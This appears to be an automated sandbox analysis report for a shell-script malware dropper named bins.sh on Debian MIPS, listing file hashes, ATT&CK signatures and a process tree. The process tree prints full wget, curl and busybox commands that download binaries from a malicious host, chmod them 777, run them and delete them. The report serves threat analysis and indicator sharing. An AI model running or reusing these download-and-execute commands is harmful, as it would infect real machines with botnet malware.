Analysis

  • max time kernel
    72s
  • max time network
    104s
  • platform
    debian-9_mipsel
  • resource
    debian9-mipsel-20240226-en
  • resource tags

    arch:mipselimage:debian9-mipsel-20240226-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem
  • submitted
    28-10-2024 09:13

General

  • Target

    bins.sh

  • Size

    10KB

  • MD5

    b385712a9f0ed1dbec9bfc8275bb2da9

  • SHA1

    dedbedbd8e99674ee12610605d357a8375915d7d

  • SHA256

    7a1469a1ef092c727698affaffb0f788d398db1e393a4453f28aa140a8c943e7

  • SHA512

    1edd1419ac72eaf9befc0c174972fc05992bee64cc63851c526a43fa229181e080f0255f6fc9594a41b0fe23521fa4ed19eff11b2bb485679870f1155929227e

  • SSDEEP

    192:iZ//MNtZQV/VxcbrorvqKGXT0MbGadXLPoBp5//MNtZ0VxcbrSrveX90MbGadLPF:iZ//MNtZQV/VxcbrorvqKgT0MbGadXLX

Malware Config

Signatures

  • File and Directory Permissions Modification 1 TTPs 2 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

  • Executes dropped EXE 2 IoCs
  • Reads runtime system information 3 IoCs

    Reads data from /proc virtual filesystem.

  • System Network Configuration Discovery 1 TTPs 8 IoCs

    Adversaries may gather information about the network configuration of a system.

  • Writes file to tmp directory 8 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/bins.sh
    /tmp/bins.sh
    1⤵
      PID:696
      • /bin/rm
        /bin/rm bins.sh
        2⤵
          PID:703
        • /usr/bin/wget
          wget http://conn.masjesu.zip/bins/b0z8mLhrFDQUev7oJgrOzasRp2pmYpZAF3
          2⤵
          • System Network Configuration Discovery
          • Writes file to tmp directory
          PID:705
        • /usr/bin/curl
          curl -O http://conn.masjesu.zip/bins/b0z8mLhrFDQUev7oJgrOzasRp2pmYpZAF3
          2⤵
          • Reads runtime system information
          • System Network Configuration Discovery
          • Writes file to tmp directory
          PID:713
        • /bin/busybox
          /bin/busybox wget http://conn.masjesu.zip/bins/b0z8mLhrFDQUev7oJgrOzasRp2pmYpZAF3
          2⤵
          • System Network Configuration Discovery
          • Writes file to tmp directory
          PID:726
        • /bin/chmod
          chmod 777 b0z8mLhrFDQUev7oJgrOzasRp2pmYpZAF3
          2⤵
          • File and Directory Permissions Modification
          PID:728
        • /tmp/b0z8mLhrFDQUev7oJgrOzasRp2pmYpZAF3
          ./b0z8mLhrFDQUev7oJgrOzasRp2pmYpZAF3
          2⤵
          • Executes dropped EXE
          PID:729
        • /bin/rm
          rm b0z8mLhrFDQUev7oJgrOzasRp2pmYpZAF3
          2⤵
            PID:732
          • /usr/bin/wget
            wget http://conn.masjesu.zip/bins/ZMaFoHVZeblnP6gz2Pb70FgBkc0VcEZLcZ
            2⤵
            • System Network Configuration Discovery
            • Writes file to tmp directory
            PID:733
          • /usr/bin/curl
            curl -O http://conn.masjesu.zip/bins/ZMaFoHVZeblnP6gz2Pb70FgBkc0VcEZLcZ
            2⤵
            • Reads runtime system information
            • System Network Configuration Discovery
            • Writes file to tmp directory
            PID:734
          • /bin/busybox
            /bin/busybox wget http://conn.masjesu.zip/bins/ZMaFoHVZeblnP6gz2Pb70FgBkc0VcEZLcZ
            2⤵
            • System Network Configuration Discovery
            • Writes file to tmp directory
            PID:736
          • /bin/chmod
            chmod 777 ZMaFoHVZeblnP6gz2Pb70FgBkc0VcEZLcZ
            2⤵
            • File and Directory Permissions Modification
            PID:737
          • /tmp/ZMaFoHVZeblnP6gz2Pb70FgBkc0VcEZLcZ
            ./ZMaFoHVZeblnP6gz2Pb70FgBkc0VcEZLcZ
            2⤵
            • Executes dropped EXE
            PID:738
          • /bin/rm
            rm ZMaFoHVZeblnP6gz2Pb70FgBkc0VcEZLcZ
            2⤵
              PID:740
            • /usr/bin/wget
              wget http://conn.masjesu.zip/bins/yX3YdCFs1A4KoS8fbRvfuv8KU0qAZW1MFX
              2⤵
              • System Network Configuration Discovery
              • Writes file to tmp directory
              PID:741
            • /usr/bin/curl
              curl -O http://conn.masjesu.zip/bins/yX3YdCFs1A4KoS8fbRvfuv8KU0qAZW1MFX
              2⤵
              • Reads runtime system information
              • System Network Configuration Discovery
              • Writes file to tmp directory
              PID:742

          Network

          MITRE ATT&CK Enterprise v15

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • /tmp/ZMaFoHVZeblnP6gz2Pb70FgBkc0VcEZLcZ

            Filesize

            101KB

            MD5

            8d0f8d45165dc1f3ba334ce75be39621

            SHA1

            1d5baece9d5af3885276735c3c20d28e161e00ff

            SHA256

            17441ed8bf165953a69907fb286dd47f2de3f94b744da25c889f86514b904791

            SHA512

            a8b032ce95f8a70b8c8c0b60b711d379706938c571bcb5cfd7fd16dac64c7d005987169abfd5d0d53b2e1da14eb1bd24cf913c7202f5855a9e4f0d80ce86f5e7

          • /tmp/b0z8mLhrFDQUev7oJgrOzasRp2pmYpZAF3

            Filesize

            100KB

            MD5

            3b78bb645b81d600c30713d416f666be

            SHA1

            23796112f2cce2afb2217498b5ecf2801ab550f2

            SHA256

            d52f8bcb15a590aa5624c446091f1cd0705b68e4647debaeecf8cfa1fe425bd2

            SHA512

            9532ede2d78f1f62f291c8d8d4023c9c579a0bdd042ca11af179adcab96ac2eb178ecb34b9e4b99a33f828694b9839abebabd2ef57dd36d1936027bad1987cf9

          • /tmp/yX3YdCFs1A4KoS8fbRvfuv8KU0qAZW1MFX

            Filesize

            88KB

            MD5

            e9e5d79acad49bbe6c77df0385ec77aa

            SHA1

            53bbc8b58873cf3117743fab15bd5508421370eb

            SHA256

            a585eff62bec554d3d7f23aaf9b298a15eb328e8968352339db915ef427f27bd

            SHA512

            828680ef393890f3c8805527a473f018b212fa1d6c8534fc03bb34f910de4b8d1cd5ce3cef2c06396f225a61794205a61d9fdc6847b14ebd6d7267af9f38f381

          • /tmp/yX3YdCFs1A4KoS8fbRvfuv8KU0qAZW1MFX

            Filesize

            12KB

            MD5

            8bd9ed049a0d02b29a05249c4f5a48ef

            SHA1

            89ba06fada2c17657baac44c972ed118bedd4590

            SHA256

            f1998857b0ee9a2b0e863da21667097f6e2021f5574d0146a7b376b4d7a10b1c

            SHA512

            d9524b443d1e068c380bf5c14aac78a2dfd6b46763cd001275d048c2c276d51aff4ee9b98de91745b2efc7b4306adf8e82cede6409aff21bcb6881cc493a079c